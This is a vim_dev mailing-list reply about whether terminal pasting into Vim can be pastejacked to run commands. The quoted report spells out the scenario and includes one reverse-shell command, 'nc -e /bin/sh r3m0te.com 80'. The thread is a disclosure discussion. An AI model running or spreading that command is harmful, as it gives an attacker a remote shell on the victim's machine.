sıx wrote:
> On 01/19/2017 08:05 AM, Marc Weber wrote:
> >
> > Insert mode is not for pasting, see pasttoggle / paste optoins.
> > :r!cat then ctrl-d is a fast workaround for linux systems.
> >
> > If you can reproduce your issue with paste mode you clearly have a found
> > a bug (IMHO). In the other case I'm unsure because pasting is no
> > different from typing thus you probably can paste :!<run command>
> > equally well in some way or <c-r>=system('...') like command (no idea,
> > never tried it)
> >
> > Other people might have more knowledge.
> >
> > Marc Weber
> >
>
> The trigger in this is a commonly used "ctrl+shift+v". I have asked
> around a few vim users about how they copy a text from a website into a
> file opened by vim. It looks like that everyone is doing that way.
That is not so. A user should start insert mode and the paste with
a middle mouse click. Only then will Vim know that this is pasted text
and handle it properly.
When using ctrl-shift-v you are actually pasting into the terminal. Vim
doesn't see this as a paste action. It's then the terminal that sends
the pasted text to the running program. If that's Vim then it will
execute the keystrokes as if they were typed. Just like any other
program would do that, including a shell. There is nothing wrong with
that.
> Maybe I was not clear enough in the first mail, but the exploit scenario
> can be the following:
>
> 1. User opens a website, for example "Vim Tutorial".
> 2. User copies text from the webpage, but it's pastejacked (eg. the user
> copies the exploit payload and not what he sees on the site). Reference:
> https://github.com/dxa4481/Pastejacking
> 3. User insert this text by "ctrl+shift+v" into a file opened by vim.
> (note: he does not even need to be in INSERT mode of course.)
> 4. Then by this, INSERT mode is escaped if needed and the following is
> executed: nc -e /bin/sh r3m0te.com 80
>
>
> In case the file containing the crafted message, it does not escape, but
> in case of manual copy paste there is always a way to make it work.
>
> If you think it's just a bug, then I can share the PoC here, but for
> sure it can be really dangerous.
Yes, copy/pasting stuff from a website can be dangerous. Guess what,
just opening a web site is already dangerous (that's how much phishing
attacks work, they just trick you into opening a web site that's
infected).
In my opinion both problems need to be fixed on the side of the browser,
anything else isn't going to fix the problem.
--
"Intelligence has much less practical application than you'd think."
-- Scott Adams, Dilbert.
/// Bram Moolenaar -- [email protected] -- http://www.Moolenaar.net \\\
/// sponsor Vim, vote for features -- http://www.Vim.org/sponsor/ \\\
\\\ an exciting new programming language -- http://www.Zimbu.org ///
\\\ help me help AIDS victims -- http://ICCF-Holland.org ///
--
--
You received this message from the "vim_dev" maillist.
Do not top-post! Type your reply below the text you are replying to.
For more information, visit http://www.vim.org/maillist.php
---
You received this message because you are subscribed to the Google Groups
"vim_dev" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
For more options, visit https://groups.google.com/d/optout.
